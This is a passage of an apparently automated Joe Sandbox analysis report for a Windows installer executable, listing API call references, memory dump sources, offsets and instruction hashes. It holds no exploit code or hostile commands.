                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 0040602A
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                                              • Part of subcall function 00405BF6: CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,004C5000,?,00000000,000000F0), ref: 00401672
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1892508949-0
                                                                                                                                                                            • Opcode ID: 95a4860431ad72eda60d3769fb9d39a986bc9f4f4600bed416f8c382693ae343
                                                                                                                                                                            • Instruction ID: 984bc8847ab7730807188d0ae4260eaffd58af59862b83f9ec54611d8a9cde38
                                                                                                                                                                            • Opcode Fuzzy Hash: 95a4860431ad72eda60d3769fb9d39a986bc9f4f4600bed416f8c382693ae343
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B11C431504514EBDF20AFA5CD4169F36A0EF14368B29493FF942B22F1D63E8981DA5E
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                            • Opcode ID: 1afaa0eb68ef52f167e8a4d151f2c3bf02fb3977f39619ee02b743959e6b5f4c
                                                                                                                                                                            • Instruction ID: 1ca5a891072309ee4d57d6c386aa99eedf8583e79045272cabd10b8210a2a1fd
                                                                                                                                                                            • Opcode Fuzzy Hash: 1afaa0eb68ef52f167e8a4d151f2c3bf02fb3977f39619ee02b743959e6b5f4c
                                                                                                                                                                            • Instruction Fuzzy Hash: 3311C171904206EADF15DFA0DA585AE7774FF04348F20443FE802B62D0D3B84A41DB5D
                                                                                                                                                                            APIs
                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                            • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                                                            • Instruction ID: 79785e1055596f35c81cc11ac1c08ebc052ec65b95c8641ce566291046e0593e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                                                            • Instruction Fuzzy Hash: C10144316202109BEB091B799D04B2B3398E750754F20427FF841F32F0E6B8CC028B4E
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405C46
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                                                            • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                                                                                                                                            • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                                                            • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                            • Opcode ID: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                                                            • Instruction ID: 678fb2cce29b027916b6e9c77d741f72fc3b9667aac1924bad6fa13dfa27649e
                                                                                                                                                                            • Opcode Fuzzy Hash: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                                                            • Instruction Fuzzy Hash: E6E0BFB4500209BFFB009B64ED49F7B7B7CE704605F008525BD10F2191D774D8159A7D
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                                                              • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                                              • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                                                                                                                                              • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                            • Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                                                            • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                                                            • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,74DF3420,00000000,74DF2EE0,00403CB6,004D1000,00403BB5,?,?,00000008,0000000A,0000000C), ref: 00403CF9
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403D00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1100898210-0
                                                                                                                                                                            • Opcode ID: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                                                            • Instruction ID: 6cc7235c82e409e594193dc40a4abc0356c386f753d5776fe34d96f63476a0b8
                                                                                                                                                                            • Opcode Fuzzy Hash: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE012334151305BD6225F59FE0575ABB68BF45F22F05C52FE940BB2A18BB85C424FD8
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                            • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                            • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                                                                                                                            • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                            • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
• GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
APIs
• CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
• CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• WriteFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,0042158D,0041E6F0,0040359E,0041E6F0,0042158D,004266F0,00004000,?,00000000,004033C8,00000004), ref: 00406258
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• ReadFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,004266F0,0041E6F0,0040361A,00008001,00008001,0040351E,004266F0,00004000,?,00000000,004033C8), ref: 00406229
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• RegOpenKeyExW.KERNEL32(00000000,0043A728,00000000,00000000,?,?,00000000,?,0040659D,?,0043A728,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,00000000), ref: 00406533
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
  • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
  • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
  • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
  • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
  • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
  • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
  • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
  • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
  • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
  • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
• String ID:
• API String ID: 2972824698-0
APIs
• GetDlgItem.USER32(?,00000403), ref: 004058C4
• GetDlgItem.USER32(?,000003EE), ref: 004058D3
• GetClientRect.USER32(?,?), ref: 00405910
• GetSystemMetrics.USER32(00000002), ref: 00405917
• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
• SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
• ShowWindow.USER32(?,00000008), ref: 004059B3
• GetDlgItem.USER32(?,000003EC), ref: 004059D4
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
• GetDlgItem.USER32(?,000003F8), ref: 004058E2
  • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
• GetDlgItem.USER32(?,000003EC), ref: 00405A26
• CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
• CloseHandle.KERNEL32(00000000), ref: 00405A3B
• ShowWindow.USER32(00000000), ref: 00405A5F
• ShowWindow.USER32(?,00000008), ref: 00405A64
• ShowWindow.USER32(00000008), ref: 00405AAE
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
• CreatePopupMenu.USER32 ref: 00405AF3
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
• GetWindowRect.USER32(?,?), ref: 00405B27
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
• OpenClipboard.USER32(00000000), ref: 00405B88
• EmptyClipboard.USER32 ref: 00405B8E
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
• GlobalLock.KERNEL32(00000000), ref: 00405BA4
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
• GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
• SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
• CloseClipboard.USER32 ref: 00405BE9
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: H'D${
• API String ID: 590372296-3538427676
APIs
• GetDlgItem.USER32(?,000003F9), ref: 004050A6
• GetDlgItem.USER32(?,00000408), ref: 004050B1
• GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
• LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
• SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
• SendMessageW.USER32(?,00001109,00000002), ref: 00405167
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
• DeleteObject.GDI32(00000000), ref: 00405188
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
  • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
• GetWindowLongW.USER32(?,000000F0), ref: 004052CC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
• ShowWindow.USER32(?,00000005), ref: 004052EA
• SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
• ImageList_Destroy.COMCTL32(?), ref: 004054B8
• GlobalFree.KERNEL32(?), ref: 004054C8
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
